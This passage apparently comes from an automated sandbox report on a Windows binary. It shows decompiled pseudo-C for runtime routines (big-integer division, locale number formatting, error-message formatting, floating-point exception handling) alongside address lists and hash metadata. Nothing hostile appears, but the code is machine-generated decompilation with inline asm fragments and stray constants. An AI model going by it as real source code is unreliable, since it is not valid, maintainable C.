    									asm("bsr eax, esi");
    									_v56 = _t351;
    									if(__eflags == 0) {
    										_t270 = 0x20;
    									} else {
    										_t270 = 0x1f - _t201;
    									}
    									_v40 = _t270;
    									_v64 = 0x20 - _t270;
    									__eflags = _t270;
    									if(_t270 != 0) {
    										_t292 = _v40;
    										_v36 = _v36 << _t292;
    										_v56 = _t351 << _t292 | _v36 >> _v64;
    										__eflags = _t330 - 2;
    										if(_t330 > 2) {
    											_t79 = _t330 * 4; // 0xe850ffff
    											_t81 =  &_v36;
    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
    											__eflags =  *_t81;
    										}
    									}
    									_v76 = 0;
    									_t307 = _t306 + 0xffffffff;
    									__eflags = _t307;
    									_v32 = _t307;
    									if(_t307 < 0) {
    										_t331 = 0;
    										__eflags = 0;
    									} else {
    										_t85 =  &(_t262[1]); // 0x4
    										_v20 =  &(_t85[_t307]);
    										_t206 = _t307 + _t330;
    										_t90 = _t262 - 4; // -4
    										_v12 = _t206;
    										_t278 = _t90 + _t206 * 4;
    										_v80 = _t278;
    										do {
    											__eflags = _t206 - _v16;
    											if(_t206 > _v16) {
    												_t207 = 0;
    												__eflags = 0;
    											} else {
    												_t207 = _t278[2];
    											}
    											__eflags = _v40;
    											_t311 = _t278[1];
    											_t279 =  *_t278;
    											_v52 = _t207;
    											_v44 = 0;
    											_v8 = _t207;
    											_v24 = _t279;
    											if(_v40 > 0) {
    												_t318 = _v8;
    												_t336 = _t279 >> _v64;
    												_t230 = E0084DDE0(_t311, _v40, _t318);
    												_t279 = _v40;
    												_t207 = _t318;
    												_t311 = _t336 | _t230;
    												_t359 = _v24 << _t279;
    												__eflags = _v12 - 3;
    												_v8 = _t318;
    												_v24 = _t359;
    												if(_v12 >= 3) {
    													_t279 = _v64;
    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
    													__eflags = _t360;
    													_t207 = _v8;
    													_v24 = _t360;
    												}
    											}
    											_t208 = E00860E30(_t311, _t207, _v56, 0);
    											_v44 = _t262;
    											_t263 = _t208;
    											_v44 = 0;
    											_t209 = _t311;
    											_v8 = _t263;
    											_v28 = _t209;
    											_t333 = _t279;
    											_v72 = _t263;
    											_v68 = _t209;
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L40:
    												_t264 = _t263 + 1;
    												asm("adc eax, 0xffffffff");
    												_t333 = _t333 + E0084DE00(_t264, _t209, _v56, 0);
    												asm("adc esi, edx");
    												_t263 = _t264 | 0xffffffff;
    												_t209 = 0;
    												__eflags = 0;
    												_v44 = 0;
    												_v8 = _t263;
    												_v72 = _t263;
    												_v28 = 0;
    												_v68 = 0;
    											} else {
    												__eflags = _t263 - 0xffffffff;
    												if(_t263 > 0xffffffff) {
    													goto L40;
    												}
    											}
    											__eflags = 0;
    											if(0 <= 0) {
    												if(0 < 0) {
    													goto L44;
    												} else {
    													__eflags = _t333 - 0xffffffff;
    													if(_t333 <= 0xffffffff) {
    														while(1) {
    															L44:
    															_v8 = _v24;
    															_t228 = E0084DE00(_v36, 0, _t263, _t209);
    															__eflags = _t311 - _t333;
    															if(__eflags < 0) {
    																break;
    															}
    															if(__eflags > 0) {
    																L47:
    																_t209 = _v28;
    																_t263 = _t263 + 0xffffffff;
    																_v72 = _t263;
    																asm("adc eax, 0xffffffff");
    																_t333 = _t333 + _v56;
    																__eflags = _t333;
    																_v28 = _t209;
    																asm("adc dword [ebp-0x28], 0x0");
    																_v68 = _t209;
    																if(_t333 == 0) {
    																	__eflags = _t333 - 0xffffffff;
    																	if(_t333 <= 0xffffffff) {
    																		continue;
    																	} else {
    																	}
    																}
    															} else {
    																__eflags = _t228 - _v8;
    																if(_t228 <= _v8) {
    																	break;
    																} else {
    																	goto L47;
    																}
    															}
    															L51:
    															_v8 = _t263;
    															goto L52;
    														}
    														_t209 = _v28;
    														goto L51;
    													}
    												}
    											}
    											L52:
    											__eflags = _t209;
    											if(_t209 != 0) {
    												L54:
    												_t280 = _v60;
    												_t334 = 0;
    												_t355 = 0;
    												__eflags = _t280;
    												if(_t280 != 0) {
    													_t266 = _v20;
    													_t219 =  &(_a8[1]);
    													__eflags = _t219;
    													_v24 = _t219;
    													_v16 = _t280;
    													do {
    														_v44 =  *_t219;
    														_t225 =  *_t266;
    														_t286 = _t334 + _v72 * _v44;
    														asm("adc esi, edx");
    														_t334 = _t355;
    														_t355 = 0;
    														__eflags = _t225 - _t286;
    														if(_t225 < _t286) {
    															_t334 = _t334 + 1;
    															asm("adc esi, esi");
    														}
    														 *_t266 = _t225 - _t286;
    														_t266 = _t266 + 4;
    														_t219 = _v24 + 4;
    														_t164 =  &_v16;
    														 *_t164 = _v16 - 1;
    														__eflags =  *_t164;
    														_v24 = _t219;
    													} while ( *_t164 != 0);
    													_t263 = _v8;
    													_t280 = _v60;
    												}
    												__eflags = 0 - _t355;
    												if(__eflags <= 0) {
    													if(__eflags < 0) {
    														L63:
    														__eflags = _t280;
    														if(_t280 != 0) {
    															_t338 = _t280;
    															_t314 = _v20;
    															_t362 =  &(_a8[1]);
    															__eflags = _t362;
    															_t265 = 0;
    															do {
    																_t282 =  *_t314;
    																_t172 = _t362 + 4; // 0xa6a5959
    																_t362 = _t172;
    																_t314 = _t314 + 4;
    																asm("adc eax, eax");
    																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
    																asm("adc eax, 0x0");
    																_t265 = 0;
    																_t338 = _t338 - 1;
    																__eflags = _t338;
    															} while (_t338 != 0);
    															_t263 = _v8;
    														}
    														_t263 = _t263 + 0xffffffff;
    														asm("adc dword [ebp-0x18], 0xffffffff");
    													} else {
    														__eflags = _v52 - _t334;
    														if(_v52 < _t334) {
    															goto L63;
    														}
    													}
    												}
    												_t213 = _v12 - 1;
    												__eflags = _t213;
    												_v16 = _t213;
    											} else {
    												__eflags = _t263;
    												if(_t263 != 0) {
    													goto L54;
    												}
    											}
    											_t331 = 0 + _t263;
    											asm("adc esi, 0x0");
    											_v20 = _v20 - 4;
    											_t313 = _v32 - 1;
    											_t262 = _a4;
    											_t278 = _v80 - 4;
    											_t206 = _v12 - 1;
    											_v76 = _t331;
    											_v32 = _t313;
    											_v80 = _t278;
    											_v12 = _t206;
    											__eflags = _t313;
    										} while (_t313 >= 0);
    									}
    									_t309 = _v16 + 1;
    									_t204 = _t309;
    									__eflags = _t204 -  *_t262;
    									if(_t204 <  *_t262) {
    										_t191 = _t204 + 1; // 0x85d71d
    										_t274 =  &(_t262[_t191]);
    										do {
    											 *_t274 = 0;
    											_t194 =  &(_t274[1]); // 0x91850fc2
    											_t274 = _t194;
    											_t204 = _t204 + 1;
    											__eflags = _t204 -  *_t262;
    										} while (_t204 <  *_t262);
    									}
    									 *_t262 = _t309;
    									__eflags = _t309;
    									if(_t309 != 0) {
    										while(1) {
    											_t271 =  *_t262;
    											__eflags = _t262[_t271];
    											if(_t262[_t271] != 0) {
    												goto L78;
    											}
    											_t272 = _t271 + 0xffffffff;
    											__eflags = _t272;
    											 *_t262 = _t272;
    											if(_t272 != 0) {
    												continue;
    											}
    											goto L78;
    										}
    									}
    									L78:
    									return _t331;
    								} else {
    									goto L23;
    								}
    							}
    						} else {
    							_t6 =  &(_t328[1]); // 0xfc23b5a
    							_t295 =  *_t6;
    							_v44 = _t295;
    							__eflags = _t295 - 1;
    							if(_t295 != 1) {
    								__eflags = _t349;
    								if(_t349 != 0) {
    									_t342 = 0;
    									_v12 = 0;
    									_v8 = 0;
    									_v20 = 0;
    									__eflags = _t349 - 0xffffffff;
    									if(_t349 != 0xffffffff) {
    										_t250 = _v16 + 1;
    										__eflags = _t250;
    										_v32 = _t250;
    										_t373 =  &(_t262[_t349 + 1]);
    										do {
    											_t253 = E00860E30( *_t373, _t342, _t295, 0);
    											_v68 = _t303;
    											_t373 = _t373 - 4;
    											_v20 = _t262;
    											_t342 = _t295;
    											_t303 = 0 + _t253;
    											asm("adc ecx, 0x0");
    											_v12 = _t303;
    											_t34 =  &_v32;
    											 *_t34 = _v32 - 1;
    											__eflags =  *_t34;
    											_v8 = _v12;
    											_t295 = _v44;
    										} while ( *_t34 != 0);
    										_t262 = _a4;
    									}
    									_v544 = 0;
    									_t41 =  &(_t262[1]); // 0x4
    									_t370 = _t41;
    									 *_t262 = 0;
    									E0085AABF(_t370, 0x1cc,  &_v540, 0);
    									_t247 = _v20;
    									__eflags = 0 - _t247;
    									 *_t370 = _t342;
    									_t262[2] = _t247;
    									asm("sbb ecx, ecx");
    									__eflags =  ~0x00000000;
    									 *_t262 = 0xbadbae;
    									return _v12;
    								} else {
    									_t14 =  &(_t262[1]); // 0x4
    									_t344 = _t14;
    									_v544 = 0;
    									 *_t262 = 0;
    									E0085AABF(_t344, 0x1cc,  &_v540, 0);
    									_t256 = _t262[1];
    									_t322 = _t256 % _v44;
    									__eflags = 0 - _t322;
    									 *_t344 = _t322;
    									asm("sbb ecx, ecx");
    									__eflags = 0;
    									 *_t262 =  ~0x00000000;
    									return _t256 / _v44;
    								}
    							} else {
    								_t9 =  &(_t262[1]); // 0x4
    								_v544 = _t198;
    								 *_t262 = _t198;
    								E0085AABF(_t9, 0x1cc,  &_v540, _t198);
    								__eflags = 0;
    								return _t262[1];
    							}
    						}
    					} else {
    						__eflags = 0;
    						return 0;
    					}
    				} else {
    					return _t197;
    				}
    			}























































































    0x0085c10c
    0x0085c10f
    0x0085c113
    0x0085c11d
    0x0085c120
    0x0085c122
    0x0085c124
    0x0085c131
    0x0085c131
    0x0085c134
    0x0085c134
    0x0085c137
    0x0085c13a
    0x0085c13c
    0x0085c26f
    0x0085c271
    0x0085c2ba
    0x0085c2be
    0x0085c2c4
    0x0085c273
    0x0085c275
    0x0085c278
    0x0085c27a
    0x0085c27d
    0x0085c27f
    0x0085c281
    0x0085c2b5
    0x0085c2b5
    0x0085c2b5
    0x0085c283
    0x0085c288
    0x0085c28e
    0x0085c28e
    0x0085c291
    0x0085c293
    0x0085c295
    0x00000000
    0x00000000
    0x0085c297
    0x0085c298
    0x0085c29b
    0x0085c29e
    0x0085c2a0
    0x00000000
    0x0085c2a2
    0x00000000
    0x0085c2a2
    0x00000000
    0x0085c2a0
    0x0085c2a4
    0x0085c2ab
    0x0085c2af
    0x0085c2b3
    0x00000000
    0x00000000
    0x0085c2b3
    0x0085c2b6
    0x0085c2b6
    0x0085c2b8
    0x0085c2c5
    0x0085c2c8
    0x0085c2cb
    0x0085c2ce
    0x0085c2ce
    0x0085c2d2
    0x0085c2d5
    0x0085c2d8
    0x0085c2db
    0x0085c2e6
    0x0085c2dd
    0x0085c2e2
    0x0085c2e2
    0x0085c2f0
    0x0085c2f5
    0x0085c2f8
    0x0085c2fa
    0x0085c304
    0x0085c307
    0x0085c30e
    0x0085c311
    0x0085c314
    0x0085c31c
    0x0085c322
    0x0085c322
    0x0085c322
    0x0085c322
    0x0085c314
    0x0085c327
    0x0085c32e
    0x0085c32e
    0x0085c331
    0x0085c334
    0x0085c566
    0x0085c566
    0x0085c33a
    0x0085c33a
    0x0085c340
    0x0085c343
    0x0085c346
    0x0085c349
    0x0085c34c
    0x0085c34f
    0x0085c352
    0x0085c352
    0x0085c355
    0x0085c35c
    0x0085c35c
    0x0085c357
    0x0085c357
    0x0085c357
    0x0085c35e
    0x0085c362
    0x0085c365
    0x0085c367
    0x0085c36a
    0x0085c371
    0x0085c374
    0x0085c377
    0x0085c382
    0x0085c385
    0x0085c38a
    0x0085c38f
    0x0085c396
    0x0085c39b
    0x0085c39d
    0x0085c39f
    0x0085c3a3
    0x0085c3a6
    0x0085c3a9
    0x0085c3b1
    0x0085c3ba
    0x0085c3ba
    0x0085c3bc
    0x0085c3bf
    0x0085c3bf
    0x0085c3a9
    0x0085c3c9
    0x0085c3ce
    0x0085c3d3
    0x0085c3d5
    0x0085c3d8
    0x0085c3da
    0x0085c3dd
    0x0085c3e0
    0x0085c3e2
    0x0085c3e5
    0x0085c3e8
    0x0085c3ea
    0x0085c3f1
    0x0085c3f6
    0x0085c3f9
    0x0085c403
    0x0085c405
    0x0085c407
    0x0085c40a
    0x0085c40a
    0x0085c40c
    0x0085c40f
    0x0085c412
    0x0085c415
    0x0085c418
    0x0085c3ec
    0x0085c3ec
    0x0085c3ef
    0x00000000
    0x00000000
    0x0085c3ef
    0x0085c41b
    0x0085c41d
    0x0085c41f
    0x00000000
    0x0085c421
    0x0085c421
    0x0085c424
    0x0085c426
    0x0085c426
    0x0085c434
    0x0085c437
    0x0085c43c
    0x0085c43e
    0x00000000
    0x00000000
    0x0085c440
    0x0085c447
    0x0085c447
    0x0085c44a
    0x0085c44d
    0x0085c450
    0x0085c453
    0x0085c453
    0x0085c456
    0x0085c459
    0x0085c45d
    0x0085c460
    0x0085c462
    0x0085c465
    0x00000000
    0x00000000
    0x0085c467
    0x0085c465
    0x0085c442
    0x0085c442
    0x0085c445
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0085c445
    0x0085c46c
    0x0085c46c
    0x00000000
    0x0085c46c
    0x0085c469
    0x00000000
    0x0085c469
    0x0085c424
    0x0085c41f
    0x0085c46f
    0x0085c46f
    0x0085c471
    0x0085c47b
    0x0085c47b
    0x0085c47e
    0x0085c480
    0x0085c482
    0x0085c484
    0x0085c489
    0x0085c48c
    0x0085c48c
    0x0085c48f
    0x0085c492
    0x0085c495
    0x0085c497
    0x0085c4ac
    0x0085c4ae
    0x0085c4b0
    0x0085c4b2
    0x0085c4b4
    0x0085c4b6
    0x0085c4b8
    0x0085c4ba
    0x0085c4bd
    0x0085c4bd
    0x0085c4c1
    0x0085c4c3
    0x0085c4c9
    0x0085c4cc
    0x0085c4cc
    0x0085c4cc
    0x0085c4d0
    0x0085c4d0
    0x0085c4d5
    0x0085c4d8
    0x0085c4d8
    0x0085c4dd
    0x0085c4df
    0x0085c4e1
    0x0085c4e8
    0x0085c4e8
    0x0085c4ea
    0x0085c4ef
    0x0085c4f1
    0x0085c4f4
    0x0085c4f4
    0x0085c4f7
    0x0085c500
    0x0085c500
    0x0085c502
    0x0085c502
    0x0085c507
    0x0085c50d
    0x0085c511
    0x0085c514
    0x0085c517
    0x0085c519
    0x0085c519
    0x0085c519
    0x0085c51e
    0x0085c51e
    0x0085c521
    0x0085c524
    0x0085c4e3
    0x0085c4e3
    0x0085c4e6
    0x00000000
    0x00000000
    0x0085c4e6
    0x0085c4e1
    0x0085c52b
    0x0085c52b
    0x0085c52c
    0x0085c473
    0x0085c473
    0x0085c475
    0x00000000
    0x00000000
    0x0085c475
    0x0085c53c
    0x0085c541
    0x0085c544
    0x0085c548
    0x0085c549
    0x0085c54c
    0x0085c54f
    0x0085c550
    0x0085c553
    0x0085c556
    0x0085c559
    0x0085c55c
    0x0085c55c
    0x0085c564
    0x0085c56b
    0x0085c56c
    0x0085c56e
    0x0085c570
    0x0085c572
    0x0085c575
    0x0085c580
    0x0085c580
    0x0085c586
    0x0085c586
    0x0085c589
    0x0085c58a
    0x0085c58a
    0x0085c580
    0x0085c58e
    0x0085c590
    0x0085c592
    0x0085c594
    0x0085c594
    0x0085c596
    0x0085c59a
    0x00000000
    0x00000000
    0x0085c59c
    0x0085c59c
    0x0085c59f
    0x0085c5a1
    0x00000000
    0x00000000
    0x00000000
    0x0085c5a1
    0x0085c594
    0x0085c5a3
    0x0085c5ad
    0x00000000
    0x00000000
    0x00000000
    0x0085c2b8
    0x0085c142
    0x0085c142
    0x0085c142
    0x0085c145
    0x0085c148
    0x0085c14b
    0x0085c17c
    0x0085c17e
    0x0085c1c9
    0x0085c1cb
    0x0085c1d2
    0x0085c1d9
    0x0085c1dc
    0x0085c1df
    0x0085c1e5
    0x0085c1e5
    0x0085c1e6
    0x0085c1e9
    0x0085c1f0
    0x0085c1f9
    0x0085c1fe
    0x0085c201
    0x0085c206
    0x0085c209
    0x0085c20b
    0x0085c210
    0x0085c213
    0x0085c216
    0x0085c216
    0x0085c216
    0x0085c21a
    0x0085c21d
    0x0085c21d
    0x0085c222
    0x0085c222
    0x0085c22d
    0x0085c238
    0x0085c238
    0x0085c23b
    0x0085c247
    0x0085c24c
    0x0085c257
    0x0085c259
    0x0085c25b
    0x0085c261
    0x0085c266
    0x0085c268
    0x0085c26e
    0x0085c180
    0x0085c18c
    0x0085c18c
    0x0085c18f
    0x0085c19f
    0x0085c1a5
    0x0085c1ac
    0x0085c1ae
    0x0085c1b6
    0x0085c1b8
    0x0085c1ba
    0x0085c1bf
    0x0085c1c2
    0x0085c1c8
    0x0085c1c8
    0x0085c14d
    0x0085c150
    0x0085c154
    0x0085c15a
    0x0085c169
    0x0085c173
    0x0085c17b
    0x0085c17b
    0x0085c14b
    0x0085c126
    0x0085c129
    0x0085c12f
    0x0085c12f
    0x0085c115
    0x0085c11b
    0x0085c11b

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
    • Instruction ID: b59585e84a6831f72dd1d52596cc245e02d04d6817f69e2a7abfe34d661aa7ba
    • Opcode Fuzzy Hash: 018800a6249598ad81d90f5864df6e165ba524167c8a39889b5be4e4d8d1d074
    • Instruction Fuzzy Hash: ED020A71E002199FDF14CFA9C8906ADBBF1FF48315F25826AD819E7244D731AA458F94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00849E0C(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
    				short _v104;
    				short _v304;
    				short* _t23;
    				int _t24;
    
    				if( *0x86d610 == 0) {
    					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
    					 *0x88de30 = _v304;
    					 *0x88de32 = 0;
    					 *0x86d610 = 0x88de30;
    				}
    				E0083F9B6(_a4, _a8,  &_v104, 0x32);
    				_t23 = _a12;
    				_t24 = _a16;
    				 *_t23 = 0;
    				GetNumberFormatW(0x400, 0,  &_v104, 0x86d600, _t23, _t24);
    				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
    				return 0;
    			}







    0x00849e24
    0x00849e32
    0x00849e3f
    0x00849e47
    0x00849e4d
    0x00849e4d
    0x00849e63
    0x00849e68
    0x00849e6d
    0x00849e77
    0x00849e81
    0x00849e89
    0x00849e94

    APIs
    • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00849E32
    • GetNumberFormatW.KERNEL32 ref: 00849E81
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FormatInfoLocaleNumber
    • String ID:
    • API String ID: 2169056816-0
    • Opcode ID: 5062cc434431a40ed0f1e4dd5ea7e2745869e5d7e2c395039895aab9e7e3eb3d
    • Instruction ID: 0638ace213ddd0ed3e2e26838c75c05ee134117340dc833d276ecb425bf5f12f
    • Opcode Fuzzy Hash: 5062cc434431a40ed0f1e4dd5ea7e2745869e5d7e2c395039895aab9e7e3eb3d
    • Instruction Fuzzy Hash: 92014C76600309AADB109FA5DC45FAB77B8FF59710F015462FB08D7190D3B0A92487E5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00836E20(WCHAR* _a4, long _a8) {
    				long _t3;
    				signed int _t5;
    
    				_t3 = GetLastError();
    				if(_t3 == 0) {
    					return 0;
    				}
    				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
    				asm("sbb eax, eax");
    				return  ~( ~_t5);
    			}





    0x00836e20
    0x00836e28
    0x00000000
    0x00836e4f
    0x00836e41
    0x00836e49
    0x00000000

    APIs
    • GetLastError.KERNEL32(00840E08,?,00000200), ref: 00836E20
    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00836E41
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorFormatLastMessage
    • String ID:
    • API String ID: 3479602957-0
    • Opcode ID: ecc63c65d20b39cfb44b24ccbe078834ccc0eb4b5ca9d56faee5281cbc501b2f
    • Instruction ID: dd434c90490438cf629d29776501b603839beb85cf18abc06528e7baa48340c4
    • Opcode Fuzzy Hash: ecc63c65d20b39cfb44b24ccbe078834ccc0eb4b5ca9d56faee5281cbc501b2f
    • Instruction Fuzzy Hash: FCD0C7753887057EFA110B74CC05F667755B795F91F20D544B356D90D0D5B0D028D715
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E008606A4(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
    				signed int _t172;
    				signed int _t175;
    				signed int _t178;
    				signed int* _t179;
    				signed int _t195;
    				signed int _t199;
    				signed int _t202;
    				void* _t203;
    				void* _t206;
    				signed int _t209;
    				void* _t210;
    				signed int _t225;
    				unsigned int* _t240;
    				signed char _t242;
    				signed int* _t250;
    				unsigned int* _t256;
    				signed int* _t257;
    				signed char _t259;
    				long _t262;
    				signed int* _t265;
    
    				 *(_a4 + 4) = 0;
    				_t262 = 0xc000000d;
    				 *(_a4 + 8) = 0;
    				 *(_a4 + 0xc) = 0;
    				_t242 = _a12;
    				if((_t242 & 0x00000010) != 0) {
    					_t262 = 0xc000008f;
    					 *(_a4 + 4) =  *(_a4 + 4) | 1;
    				}
    				if((_t242 & 0x00000002) != 0) {
    					_t262 = 0xc0000093;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
    				}
    				if((_t242 & 0x00000001) != 0) {
    					_t262 = 0xc0000091;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
    				}
    				if((_t242 & 0x00000004) != 0) {
    					_t262 = 0xc000008e;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
    				}
    				if((_t242 & 0x00000008) != 0) {
    					_t262 = 0xc0000090;
    					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
    				}
    				_t265 = _a8;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
    				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
    				_t259 = E0085E006(_a4);
    				if((_t259 & 0x00000001) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
    				}
    				if((_t259 & 0x00000004) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
    				}
    				if((_t259 & 0x00000008) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
    				}
    				if((_t259 & 0x00000010) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
    				}
    				if((_t259 & 0x00000020) != 0) {
    					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
    				}
    				_t172 =  *_t265 & 0x00000c00;
    				if(_t172 == 0) {
    					 *_a4 =  *_a4 & 0xfffffffc;
    				} else {
    					if(_t172 == 0x400) {
    						_t257 = _a4;
    						_t225 =  *_t257 & 0xfffffffd | 1;
    						L26:
    						 *_t257 = _t225;
    						L29:
    						_t175 =  *_t265 & 0x00000300;
    						if(_t175 == 0) {
    							_t250 = _a4;
    							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
    							L35:
    							 *_t250 = _t178;
    							L36:
    							_t179 = _a4;
    							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
    							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
    							if(_a28 == 0) {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
    								 *((long long*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t254 = _a4;
    								_t240 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
    								 *(_a4 + 0x50) =  *_t240;
    							} else {
    								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
    								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
    								_t240 = _a24;
    								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
    								 *(_a4 + 0x50) =  *_t240;
    							}
    							E0085DF6C(_t254);
    							RaiseException(_t262, 0, 1,  &_a4);
    							_t256 = _a4;
    							if((_t256[2] & 0x00000010) != 0) {
    								 *_t265 =  *_t265 & 0xfffffffe;
    							}
    							if((_t256[2] & 0x00000008) != 0) {
    								 *_t265 =  *_t265 & 0xfffffffb;
    							}
    							if((_t256[2] & 0x00000004) != 0) {
    								 *_t265 =  *_t265 & 0xfffffff7;
    							}
    							if((_t256[2] & 0x00000002) != 0) {
    								 *_t265 =  *_t265 & 0xffffffef;
    							}
    							if((_t256[2] & 0x00000001) != 0) {
    								 *_t265 =  *_t265 & 0xffffffdf;
    							}
    							_t195 =  *_t256 & 0x00000003;
    							if(_t195 == 0) {
    								 *_t265 =  *_t265 & 0xfffff3ff;
    							} else {
    								_t206 = _t195 - 1;
    								if(_t206 == 0) {
    									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
    									L55:
    									 *_t265 = _t209;
    									L58:
    									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
    									if(_t199 == 0) {
    										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
    										L64:
    										 *_t265 = _t202;
    										L65:
    										if(_a28 == 0) {
    											 *_t240 = _t256[0x14];
    										} else {
    											 *_t240 = _t256[0x14];
    										}
    										return _t202;
    									}
    									_t203 = _t199 - 1;
    									if(_t203 == 0) {
    										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
    										goto L64;
    									}
    									_t202 = _t203 - 1;
    									if(_t202 == 0) {
    										 *_t265 =  *_t265 & 0xfffff3ff;
    									}
    									goto L65;
    								}
    								_t210 = _t206 - 1;
    								if(_t210 == 0) {
    									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
    									goto L55;
    								}
    								if(_t210 == 1) {
    									 *_t265 =  *_t265 | 0x00000c00;
    								}
    							}
    							goto L58;
    						}
    						if(_t175 == 0x200) {
    							_t250 = _a4;
    							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
    							goto L35;
    						}
    						if(_t175 == 0x300) {
    							 *_a4 =  *_a4 & 0xffffffe3;
    						}
    						goto L36;
    					}
    					if(_t172 == 0x800) {
    						_t257 = _a4;
    						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
    						goto L26;
    					}
    					if(_t172 == 0xc00) {
    						 *_a4 =  *_a4 | 0x00000003;
    					}
    				}
    			}























    0x008606b2
    0x008606b9
    0x008606be
    0x008606c4
    0x008606c7
    0x008606cd
    0x008606d2
    0x008606d7
    0x008606d7
    0x008606dd
    0x008606e2
    0x008606e7
    0x008606e7
    0x008606ee
    0x008606f3
    0x008606f8
    0x008606f8
    0x008606ff
    0x00860704
    0x00860709
    0x00860709
    0x00860710
    0x00860715
    0x0086071a
    0x0086071a
    0x00860722
    0x00860732
    0x00860744
    0x00860756
    0x00860769
    0x0086077b
    0x00860783
    0x00860788
    0x0086078d
    0x0086078d
    0x00860794
    0x00860799
    0x00860799
    0x008607a0
    0x008607a5
    0x008607a5
    0x008607ac
    0x008607b1
    0x008607b1
    0x008607b8
    0x008607bd
    0x008607bd
    0x008607c7
    0x008607c9
    0x00860803
    0x008607cb
    0x008607d0
    0x008607f4
    0x008607fc
    0x008607f0
